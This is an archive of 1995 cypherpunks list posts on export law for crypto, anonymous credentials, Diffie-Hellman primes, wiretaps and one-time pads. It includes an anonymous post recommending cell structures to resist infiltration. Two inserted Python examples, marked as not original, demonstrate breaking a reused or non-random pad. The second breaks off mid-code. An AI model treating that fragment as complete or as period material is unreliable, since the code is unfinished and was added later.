>On Sat, 4 Nov 1995, Timothy C. May wrote:
>
>> Therefore, there are few ways that citizenship can be "checked." Period. A
>> foreigner who wishes to "prove" his non-U.S. status could, of course, show
>> his green card. But this is different from proving citizenship.
>>
>
>And here we have the rub. People with permanent residency (i.e. green
>cards) are fully entitled to access to strong crypto. Most foreign
>students are on J-1 visas, which do not grant permanent residency.

Irrelevant.

J-1 persons are still accorded the basic rights of citizens, save for a few
things like voting, holding certain offices, and perhaps jury duty (not
sure about this, as my recent jury summons was apparently based on my
Calif. Driver's License and required no form of identification whatsoever).

My basic point was that "J-1," "permanent resident," "citizen,"
"undocumented," and "completely and totally without proper papers" are, for
the purposes being discussed here, all essentially identical. Any sysadmin
who expects to have papers proving "citizenship" or any other status will
have a tough time.

Saying "People with permanent residency (i.e. green cards) are fully
entitled to access to strong crypto." and--presumably--implying that J-1
visa holders are _not_ entitled to use strong crypto within the U.S. (or,
for that matter, in their own countries, but this is another issue), is
misleading.

The laws about "showing a foreign national" certain items do not
differentiate, so far as I have seen, between various kinds of visas.

In any case, sysadmins generally do not ask for any kind of ID or proof of
citizenship, morality, residency, etc.

(On my many computer accounts over the years, as but one example, _never_
have I been asked for credentials of any kind. Never. Not even a
driver's license, let alone a passport or birth certificate or whatever. My
current Internet Service Providers, netcom.com and got.net, are blithely
uncaring about the fact that I am technically a citizen of Ruritania, and
am not in the U.S. legally.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 5 Nov 1995 11:00:35 +0800
Subject: Re: [NOISE] Re: 800_ape [FUQ Win95 List]
In-Reply-To: <Pine.3.89.9511041332.B29112-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.ULT.3.91.951104184257.6549O-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> On Sat, 4 Nov 1995, Rich Graves wrote:
> 
> > I'm putting together a "Windows 95 Frequently Unanswered Questions File."

This little P.S. attracted a lot of attention in private email. FYI, it's
now available at:

gopher://quixote.stanford.edu:70/0R1400265-1416663-/win95netbugs

and in the newsgroups. It's short. Several points are of interest, if not
direct relevance. Point D.8., apparent bugs in handling of longints, if 
confirmed, could have beaucoup crypto relevance.

For the record, I hadn't noticed the acronym, but I like it. A lot.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 09:53:11 +0800
To: cypherpunks@toad.com
Subject: Credentials Without Identity
Message-ID: <acc154b62202100420bc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves makes some very good points, but he said something I want to
riff on.

(And as a measure of how apologetic some folks are getting about discussing
anything not on Perry's List of Approved Topics, Rich unfortunately labeled
his post "[ID point semi-off-topic]..." In fact, the issue of credentials
and identity is NOT off-topic, not even semi-off-topic. It is central to
the themes of our list. I urge all to read Chaum's seminal work on
"credentials without identity.")

At 1:05 AM 11/5/95, Rich Graves wrote:

>Proving legal residency requires a combination of two documents, one each
>from specified lists. Most commonly a driver's license, green card (which
>is actually pink), or birth certificate from list A, and a social
>security card from list B.
>
>Chris Hibbert's SSN FAQ talks a little bit about how this works, and why
>it's a Good Thing. Basically, for privacy and security reasons, it is a
>very good idea to separate the issues of identity and authorization.
>
>I don't care how securely you can authenticate who I am -- by PGP, retinal
>scan, whatever. I do not want a single digitizable token to be the key to
>my identity. Even if that identity cannot be forged (and everything can be
>forged), it can be used to track me, by the government, by the Direct
>Marketing Association, by the private investigators of certain wacky
....

Chris's (or Chris') points are admirable, but getting more and more
irrelevant by the day. The notion of unlinking identity and authorization
by separate pieces of identification is another form of "security through
obscurity."

The two forms of credentials can be linked in data bases. Just because one
piece of ID has citizenship or voting status and another has other stuff is
meaningless, provided the ID forms can be linked. As they can, in multiple
ways.

The credit tracking agencies can do this trivially, with names, social
security numbers, driver's license numbers, addresses, phone numbers, etc.
All are pointers into the cloud of numbers that constitutes one's dossier.

Happily, Chaum's work on "credentials without identity," based essentially
on the kind of "blinding" used in digital cash (with some differences, of
course), allows for one to display a credential showing one is old enough
to enter a bar or library (in 2005), without revealing a name (which is
just another credential).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hilarie Orman <ho@cs.arizona.edu>
Date: Sun, 5 Nov 1995 10:35:39 +0800
To: bsimpson@morningstar.com
Subject: Re: Photuris Primality verification needed
In-Reply-To: <1973.bsimpson@morningstar.com>
Message-ID: <9511050229.AA00198@uncial.CS.Arizona.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>  Recently, someone asked for a smaller prime of only 512-bits for speed.
>  This is more than enough for the strength of keys needed for DES, 3DES,
>  MD5 and SHA.  Perhaps this would be easier to have more complete and
>  robust verification as well.

Depending on what you think of the strength of those algorithms, the 512-bit
mod p system may not be strong enough.

The *strength* of 512-bit mod p DH systems is only about 56 bits.  You need
1024-bit primes for a *strength* of 80 bits.

In contrast, the 155-bit elliptic curve in the Photuris draft has a
strength of about 76 bits.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 5 Nov 1995 11:34:56 +0800
To: llurch@networking.stanford.edu
Subject: Re: Telephone switch capacity -Reply
Message-ID: <v02120d02acc1d4859dfc@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:43 11/3/95, Rich Graves wrote:
>[about the FBI supposedly wanting the ability to tap 1% of all phones in
>the US simultaneously]

[...]
>Of course the FBI doesn't have the staff to listen to all these lines, and
>they need an individual court order to authorize each individual
>interception, so this numbers game is a bit of a joke.

One more time. Despite what you read in the papers, despite what most
people - even in the legal profession - believe, telephone wiretaps do
_not_ require a court order. They haven't required a court order in over a
year. The Digital Telephony Bill, which passed Congress by an overwhelming
margin, _explicitly_ allows for wiretap authorizations other than a court
order. The law does not impose any rules for these "other forms of
authorization".

"The captain signed it off" may suffice.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sun, 5 Nov 1995 08:56:59 +0800
To: Cypherpunks <ses@tipper.oit.unc.edu>
Subject: Re: using PGP only for digital signatures
In-Reply-To: <Pine.SOL.3.91.951104151622.6970B-100000@chivalry>
Message-ID: <m0tBtCg-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero writes:

: It seems that licences allowing foreign nationals access to cryptographic 
: software within the US are pretty easy to get, and especially for 
: something like PGP on a central machine. 

Really?

Would you please explain how one can apply for such a license?  To say
nothing about how one can actually get one?

Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Sun, 5 Nov 1995 03:09:06 +0800
To: cypherpunks@toad.com
Subject: The Crypto Applications we would rather not talk about
Message-ID: <199511041900.UAA27770@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain





     Anonymous remailer and PGP
     Unusual applications

I don't know if anyone else caught it last year
but High Times discovered anonymous remailers
and PGP for an article last year for
anonymous remote control of grow rooms.

PGP Wins again?


and lately the thule people (bigoted and racist Nazis)
have been learning to protect themselves also
according to news reports from Germany.

Crypto and Privacy tools protect everyone
from the hero to the anti-hero...

   the technology itself is neutral

I wonder how long it will be before we hear news reports
of some of the government's people being caught using
internet casinos from the white house network.


On other notes CCCF (the chaos computer club France)
was shown to have had a high level plant from
the French intel services, The founder of the CCCF
himself.
   this story seems to repeat itself over and over
when you are doing something of which the authorities DON'T
approve they WILL attempt to infiltrate and subvert from the
inside. 

    The answers are there and have been published
in most books on tradecraft, 3 person cells organized
as pyramids. Anonymous remail tech and crypto
make this system possible without face to face contact.
When does this lesson finally get learned?


    anon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William Allen Simpson" <bsimpson@morningstar.com>
Date: Sun, 5 Nov 1995 05:02:18 +0800
To: cypherpunks@toad.com
Subject: Photuris Primality verification needed
Message-ID: <1972.bsimpson@morningstar.com>
MIME-Version: 1.0
Content-Type: text/plain


Folks, I was somewhat disappointed in the response to our previous
requests for verification of the strength of the prime moduli.

Recently, someone asked for a smaller prime of only 512-bits for speed.
This is more than enough for the strength of keys needed for DES, 3DES,
MD5 and SHA.  Perhaps this would be easier to have more complete and
robust verification as well.

Here are two "important" primes for Photuris use.  If you have some
spare cycles, it would be beneficial for in-depth verification of these
strong primes.

Implementation Optional.  A 512-bit strong prime (p), expressed in hex:

   da58 3c16 d985 2289 d0e4 af75 6f4c ca92
   dd4b e533 b804 fb0f ed94 ef9c 8a44 03ed
   5746 50d3 6999 db29 d776 276b a2d3 d412
   e218 f4dd 1e08 4cf6 d800 3e7c 4774 e833

The recommended generator (g) for this prime is 2.


Implementation Required.  A 1024-bit strong prime (p), expressed in hex:

   97f6 4261 cab5 05dd 2828 e13f 1d68 b6d3
   dbd0 f313 047f 40e8 56da 58cb 13b8 a1bf
   2b78 3a4c 6d59 d5f9 2afc 6cff 3d69 3f78
   b23d 4f31 60a9 502e 3efa f7ab 5e1a d5a6

   5e55 4313 828d a83b 9ff2 d941 dee9 5689
   fada ea09 36ad df19 71fe 635b 20af 4703
   6460 3c2d e059 f54b 650a d8fa 0cf7 0121
   c747 99d7 5871 32be 9b99 9bb9 b787 e8ab

The recommended generator (g) for this prime is 2.


> From: Phil Karn <karn@qualcomm.com>
> I've used the mpz_probab_prime() function in the Gnu Math Package (GMP) version
> 1.3.2 to test this number. This function uses the Miller-Rabin primality test.
> However, to increase my confidence that this number really is a strong prime,
> I'd like to ask others to confirm it with other tests.
>

Bill.Simpson@um.cc.umich.edu
          Key fingerprint =  2E 07 23 03 C5 62 70 D3  59 B1 4F 5E 1D C2 C1 A2




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 11:17:52 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: That's not what I wrote!
Message-ID: <acc1683f23021004b7dd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Some of you may think this is a trivial correction, but I think it
important, albeit bizarre:


At 2:41 AM 11/5/95, Rich Graves wrote:
>On Sat, 4 Nov 1995, Timothy C. May wrote:

>> Rich's (or Chris') points are admirable, but getting more and more
>> irrelevant by the day. The notion of unlinking identity and authorization
>> by separate pieces of identification is another form of "security through
>> obscurity."

No, that is NOT what I wrote. It has been changed, with no indication that
it is not what I wrote.

If you check my original you'll find that what I wrote was:

---

Chris's (or Chris') points are admirable, but getting more and more
irrelevant by the day. The notion of unlinking identity and authorization
by separate pieces of identification is another form of "security through
obscurity."

---

I can guess why Rich "corrected" my post, but he was in error for at least
two reasons. First, because he didn't indicate that he'd corrected me.
Second, because my item did not need correction.

I originally wrote "Chris's," referring to Chris Hibbert, and then thought
about the grammatical rules about forming possessives out of words ending
in "s," and so I added the alternative "(or Chris')".

Perhaps a minor point, and not one I'll lose sleep over, but I think it a
bad thing to _ever_ correct the words of another in quoted material without
indicating so. Editors who worry about typos and misspellings in quoted
material usually put a "[sic]" in the text, mainly, I think, to let
themselves off the hook for letting an error through. (Though I think
another reason is to show graphically the igorance [sic] of the quoted
author.)

This point about Rich's post should not distract from his good comments
that I responded to (or the points in the post that contained this
correction, points I have not yet read).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 11:28:38 +0800
To: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Subject: Re: The Crypto Applications we would rather not talk about
Message-ID: <acc16c1e24021004a0c8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:00 AM 11/5/95, Nathan Loofbourrow wrote:

> >     The answers are there and have been published
> > in most books on tradecraft, 3 person cells organized
> > as pyramids.
>
>I've read only fictional accounts about the 3-person cell. Any
>pointers to nonfiction material? "Tradecraft" didn't seem to be the
>magic keyword in the local card catalog.

It's easy to work out the relationships from first principles...I'm not
sure what a book would add to your understanding.

I suspect Kahn's "The Codebreakers" contains at least a brief mention of
cell organizations, though that was not Kahn's focus.

Or, look at any of the various books on Soviet spy rings in the U.S., or
various spy rings in WW II. For example, I think the true-life book "I Led
Three Lives" might still be available--it was the basis of a t.v. show I
used to watch in the early 60s. (The t.v. show presumably went to the same
Politically Incorrect resting place as "Amos and Andy," mourned by
Sapphire, The Kingfish, and me.)

--Tim

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Sun, 5 Nov 1995 10:07:07 +0800
To: cypherpunks@toad.com
Subject: Re: The Crypto Applications we would rather not talk about
In-Reply-To: <199511041900.UAA27770@utopia.hacktic.nl>
Message-ID: <199511050200.VAA11644@hammond.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Name Withheld by Request writes:
 > Crypto and Privacy tools protect everyone
 > from the hero to the anti-hero...
 > 
 >    the technology itself is neutral

Unfortunately, the technology's appearance is distinctly angled toward
the anti-hero. One, because the benefits are more obvious to the
anti-hero; and two, because the abuse of technology gets better press
than its use, particularly in the get-tough-on-crime era.

 >     The answers are there and have been published
 > in most books on tradecraft, 3 person cells organized
 > as pyramids.

I've read only fictional accounts about the 3-person cell. Any
pointers to nonfiction material? "Tradecraft" didn't seem to be the
magic keyword in the local card catalog.

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 5 Nov 1995 13:40:58 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: using pgp to make an otp
In-Reply-To: <199511050428.XAA06831@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.951104211722.6970F-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



On the subject of reused one-time-pads: What are the attacks that become 
available if a pad is used two times? The ones I can think of are:

known plaintext- if any parts of one message can be obtained or guessed, 
	the corresponding parts of the other message are automatically 
	obtained. 

statistics- (m1^C)^(m2^C) == m1 ^ m2. If the message is English, then 
certain combinations of letters are more frequent than others. Try more 
probable combinations first. 

Guess phrases - pick a common word - slide it down the m1^m2 text and 
see if the result looks like English - if it does, you've got a word in 
one, and a bunch of known text in another. 

The latter attack looks like it could be automated pretty well, and could 
run pretty fast, but I get the feeling I'm missing an obvious, better 
method. What's the standard way of attacking TTPs?

What's the most secure way to reuse an OTP if (say) an emergency happens 
when you're on the road, and you're out of pad? Could you build a 
sequence of keys for something like DES from widely separated bits of the 
pad, and use each key for one block, or is this likely to expose the 
original OTPed message, as well as the successor messages?

Simon
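
[Added example, not part of the original post: a small demonstration of why a pad must never be used twice. It shows the pad cancelling out of the XOR of two ciphertexts, the known-plaintext case, and the phrase-sliding check described above. The messages and function names are constructed for illustration.]

```python
import secrets

# Bytes we accept as "looks like English" for this toy check.
ALLOWED = set(b"abcdefghijklmnopqrstuvwxyz ")

# Constructed sample plaintexts (lowercase letters and spaces only).
M1 = b"the quarterly report is due on friday morning"
M2 = b"please send the backup tapes to the archive"


def xor_bytes(a, b):
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def recover_with_known(c1, c2, known_m1):
    """Known-plaintext case: knowing m1 yields m2 without ever seeing the pad."""
    return xor_bytes(xor_bytes(c1, c2), known_m1)


def crib_drag(c1, c2, crib):
    """Slide `crib` along c1 ^ c2 and keep offsets whose result looks like text.

    If one message contains `crib` at offset i, the XOR at that offset is
    the matching fragment of the other message.
    """
    mixed = xor_bytes(c1, c2)          # the pad cancels: this equals m1 ^ m2
    hits = []
    for i in range(len(mixed) - len(crib) + 1):
        frag = xor_bytes(mixed[i:i + len(crib)], crib)
        if all(ch in ALLOWED for ch in frag):
            hits.append((i, frag))
    return hits


def demo():
    """Encrypt both sample messages under one random pad, then analyse them."""
    pad = secrets.token_bytes(max(len(M1), len(M2)))
    c1 = xor_bytes(M1, pad)
    c2 = xor_bytes(M2, pad)
    return c1, c2, crib_drag(c1, c2, b" the ")


if __name__ == "__main__":
    c1, c2, hits = demo()
    print("c1 ^ c2 == m1 ^ m2:", xor_bytes(c1, c2) == xor_bytes(M1, M2))
    for offset, frag in hits:
        print(offset, frag)
```
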




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sun, 5 Nov 1995 11:46:56 +0800
To: Cypherpunks <tcmay@got.net (Timothy C. May)
Subject: Re: To Repeat: Credentials Not Considered Necessary
In-Reply-To: <acc151232102100449bf@[205.199.118.202]>
Message-ID: <m0tBvvQ-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

: At 1:03 AM 11/5/95, Simon Spero wrote:

: >And here we have the rub. People with permanent residency (i.e. green
: >cards) are fully entitled to access to strong crypto. Most foreign
: >students are on J-1 visas, which do not grant permanent residency.
: 
: Irrelevant.
: 
: J-1 persons are still accorded the basic rights of citizens, save for a few
: things like voting, holding certain offices, and perhaps jury duty (not
: sure about this, as my recent jury summons was apparently based on my
: Calif. Driver's License and required no form of identification whatsoever).

It is however a violation of the ITAR to disclose cryptographic
software (including algorithms) to students on a J-1 visa, but not to 
someone who has a green card.

: Saying "People with permanent residency (i.e. green cards) are fully
: entitled to access to strong crypto." and--presumably--implying that J-1
: visa holders are _not_ entitled to use strong crypto within the U.S. (or,
: for that matter, in their own countries, but this is another issue), is
: misleading.

It is--if the ITAR is constitutional--a serious felony to give J-1
visa holders access to strong--and to weak--crypto, but no one has
implied that they are not entitled to use it.  Nothing in the law of
the United States says that foreign persons can't get crypto, it is
just a felony to disclose it to them (within or without the United
States).

: The laws about "showing a foreign national" certain items do not
: differentiate, so far as I have seen, between various kinds of visas.

The ITAR distinguishes between foreign persons, who are not U.S.
persons, and U.S. persons who are either United States citizens or
have a visa admitting them to permanent residency in the United
States.  The crime at issue is disclosing cryptographic software to
foreign persons.  And whether one is a foreign person does depend on 
what type of visa one has (if one is not a U.S. citizen).

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 5 Nov 1995 14:53:07 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: lp (134.222.35.2)?
In-Reply-To: <199511050620.HAA14046@utopia.hacktic.nl>
Message-ID: <Pine.SOL.3.91.951104223658.7174A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 5 Nov 1995, Anonymous wrote:

> >  Notice that both messages went through an unnamed site -- 134.222.9.1 and
> >  then a strangely-named site, "lp (134.222.35.2)" -- then through the same
> >  Vienna, Virginia (USA) site ... and thereafter, on to their destination.
> >  I.e., the second message went through Virginia to get from Switzerland to
> >  Israel.
> >  
> >  The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information
> >  report, ``No match for "134.222.9.1". '' and `` No match for
> >  "134.222.35.2".''

Yes, you've finally cottoned on to the secret NSA routing trick to 
cleverly tap all traffic. Really clever the way they use two hosts in the 
132.222 Class B network. Strange that traffic from EUNET should be using 
that network, especially since it happens to be listed in the whois 
database as being NET-EUNET-X25.

::chivalry:ses$ whois -h rs.internic.net 134.222
::European Unix Users Group (NET-EUNET-X25)
::   Kruislaan 413
::   NL-1098 SJ Amsterdam
::   NETHERLANDS





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Sun, 5 Nov 1995 15:02:13 +0800
To: cypherpunks@toad.com
Subject: Re: lp (134.222.35.2)?
Message-ID: <199511050653.WAA17662@xenon.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


You don't really need a special (and clearly suspicious) IP address to
perform driftnet fishing.  All you need is to be sure that all physical
packets pass through a checkpoint charlie and just park a sniffer there
to watch everything fly by.

On the other hand, it would be interesting to see how hard NSA pushes
behind the scenes to have physical long distance cables run through the
US routers/switches (in the name of US national security, of course).

It would be fun (perhaps horrible) to see what the NSA does the first
time Israel or France set up their own high capacity long distance to
other friendly/unfriendly countries (thus bypassing the US completely).
Second, let France or some other country set up major Internet routing
clearinghouses which advertise secure routes to other nations (not US).

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Sun, 5 Nov 1995 15:10:38 +0800
To: cypherpunks@toad.com
Subject: Re: lp (134.222.35.2)?
Message-ID: <v03003901acc20da1f22f@[198.93.25.98]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:20 5.11.95, Anonymous wrote:

> it seemed worth reposting to CP--no, it's not entirely crypto-related,
> but nor is it a completely vague allegation.
[...]
> From GovAccess.183.snoops:
[...]
>>  Notice that both messages went through an unnamed site -- 134.222.9.1 and
>>  then a strangely-named site, "lp (134.222.35.2)" -- then through the same
>>  Vienna, Virginia (USA) site ... and thereafter, on to their destination.
>>  I.e., the second message went through Virginia to get from Switzerland to
>>  Israel.
>>
>>  The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information
>>  report, ``No match for "134.222.9.1". '' and `` No match for
>>  "134.222.35.2".''
>>
>>  Now let me see ... which spy agencies are located in or near Virginia?

Oh please.

The probable reason that the InterNIC doesn't know about the
132.222.0.0 networks is because they're in Europe. If you search for
either of the network numbers of the IP addresses mentioned above in
the RIPE database <http://www.ripe.net/>, you will find that they
belong to the EUnet backbone.

After pinging 134.222.9.1 successfully, I telnetted to it and it
claimed, quite plausibly, that it's a device (presumably a router) in
Amsterdam. I am currently unable to ping 134.222.35.2; this, however,
fills me with no dread whatsoever.

_______________________________________________________________________
Stephan Somogyi               Senior Editor               Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 5 Nov 1995 15:29:40 +0800
To: cypherpunks@toad.com
Subject: Re: Sun speaks out - but not to the cypherpunks
Message-ID: <199511050721.XAA14000@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I know that it is rude to follow up one of your own posts, and I apologize
in advance for this horrible faux-pas, but hopefully, it's excused this
one time.  I wrote: 

>One example of this that should serve as a useful case study is a recent
>problem which was brought to the Canadian public's attention just this
>week, on a program called the Fifth Estate.  The CBC (Canadian
>Broadcasting Corporation) detailed a software code problem in one of
>AECL's (Atomic Energy of Canada Limited's) instruments which deliver
>penetrating radiation. 
>
>The software which controlled the radiation dose, would periodically
>override the oncologist's calibration and deliver a radiation dose 100
>times what was prescribed.  This software "bug" literally killed wherever
>the machine was in use. 

Does anyone on this list know if the CBC has a web site on the Net?

I'm hoping that someone (hint, hint) who has a convenient website, one
with lots of spare bandwidth could volunteer to contact the CBC and
persuade them to copyright clear the Fifth Estate program clip which
documented some of the risks of software bugs in mission critical
applications, and allow it to be placed on the Net.  I'm hoping that this
English language piece reaches a wide international audience. 

The Canadian Broadcasting Corporation is a Crown Corporation which has
historically received its primary funding from the Government of Canada. 
Recently, it has suffered under the budgetary ax, and the push for
privatization.  I'm pretty confident that the Corporation would copyright
clear the clip for MPEG distribution across the Net, if they were
approached with the concept that the clip was a demonstration of the CBC's
journalistic excellence and integrity, a piece which is demonstrative of
the critical need to continue their funding.  A concrete demonstration of
the need for the CBC.  And a piece which could well receive deserved
international acclaim. 

The site would help them, and would simultaneously be a site of
international public service. 

Nothing will drive home the need for quality software, quality code, and
quality security more than the vivid graphic pictures of the consequences
of sloppy code, or of the risks if certain critical systems, LANs, or
private networks are compromised, or if security and privacy (which are
flip sides of the same coin) are ignored. 

The sight of a body, that has had a hole burned straight through it from
the front through to the spine is truly chilling and drives the message
home.  Nothing seems to speak as clearly as a picture ... as to what the
stakes are ... of what "bugs" in code do ... and of what a network
compromise can leave in its wake. 

A picture of consequences.

Six people died in Canada and the United States due to the software flaw. 
Even after numerous reports of the flaws, the company refused to even
acknowledge the existence of a problem, and in fact did everything within
its power to make sure doctors, radiologists and physicists were unaware. 

The attitude of trivialization can only be characterized as fantastic, and
would be unbelievable to anyone who has not viewed the piece. 

It's one hell of a backgrounder which not only details problems, but looks
at solutions -- it examines attitudes, especially management attitudes.  It
truly deserves an expanded audience.  From teachers, to students, to the
international media, to the concerned private individual, all will be
served well if this piece gets wide attention. 

Takers, anyone??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 5 Nov 1995 12:34:58 +0800
To: amp <Alan.Pugh@internetmci.com>
Subject: Re: using pgp to make an otp
In-Reply-To: <01HX8P5B3MCI91XT4Q@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <199511050428.XAA06831@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



amp writes:
> i want a source of data for use as a otp. i don't want to have to
> hook up any external devices to my pc to do it. (although some of the
> methods mentioned in the past few days are quite interesting.) 
> 
> i'd like to know if there was a reason not to use the output of pgp
> to do it.

Yes. What you have then is just an elaborate cipher that is not a one
time pad. For it to be a one time pad, the numbers must be truly
random and generated only once, period.

> i would think that the output of pgp should be pretty darn random.

If PGP is good enough for use as a source for cipher keying material,
then you needn't use it as a one time pad -- just use PGP directly. If
PGP isn't good enough, it certainly isn't good enough for use as
cipher keying material. In either case, it is NOT NOT NOT a one time
pad if it isn't truly random numbers -- that means physically random.

Perry
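
Added example (not part of Perry Metzger's message or of the thread): a short Python sketch of the distinction drawn above. It assumes a hypothetical generator, SHA-256 in counter mode over a deliberately tiny 16-bit seed, as a stand-in for any algorithmic "pad" such as cipher output; the messages and seed are constructed.

```python
import hashlib
import secrets

SEED_BITS = 16  # deliberately tiny so the exhaustive search runs in well under a second


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def derived_pad(seed: int, length: int) -> bytes:
    """A 'pad' computed by an algorithm from a short secret.

    Hypothetical stand-in for cipher output: SHA-256 in counter mode.
    """
    out = bytearray()
    counter = 0
    while len(out) < length:
        block = seed.to_bytes(SEED_BITS // 8, "big") + counter.to_bytes(4, "big")
        out += hashlib.sha256(block).digest()
        counter += 1
    return bytes(out[:length])


def seeds_explaining(ciphertext: bytes, plaintext: bytes) -> list:
    """Every seed whose derived pad maps `plaintext` to `ciphertext`."""
    needed = xor(ciphertext, plaintext)
    return [s for s in range(1 << SEED_BITS)
            if derived_pad(s, len(needed)) == needed]


def pad_explaining(ciphertext: bytes, plaintext: bytes) -> bytes:
    """With an unconstrained pad, some pad maps ANY same-length plaintext
    to the ciphertext; this returns it."""
    return xor(ciphertext, plaintext)


# Constructed sample data (not from the thread).
MESSAGE = b"send the key on monday"
DECOY = b"send the key on friday"   # same length, different meaning
SEED = 0xB10C


def demo() -> dict:
    # Case 1: algorithmic pad. Only 2**16 pads can ever occur, so the
    # ciphertext is consistent with the real message under exactly one
    # seed and with the decoy under none: the seed space is the real key.
    ct_derived = xor(MESSAGE, derived_pad(SEED, len(MESSAGE)))

    # Case 2: unconstrained pad. secrets.token_bytes is the OS generator,
    # used here only as a stand-in; the requirement stated in the message
    # above is a physically random source.
    true_pad = secrets.token_bytes(len(MESSAGE))
    ct_random = xor(MESSAGE, true_pad)
    decoy_pad = pad_explaining(ct_random, DECOY)

    return {
        "derived_real": seeds_explaining(ct_derived, MESSAGE),
        "derived_decoy": seeds_explaining(ct_derived, DECOY),
        # The decoy pad is as valid a pad as the true one, so the
        # ciphertext alone cannot distinguish the two messages.
        "random_decoy_ok": xor(ct_random, decoy_pad) == DECOY,
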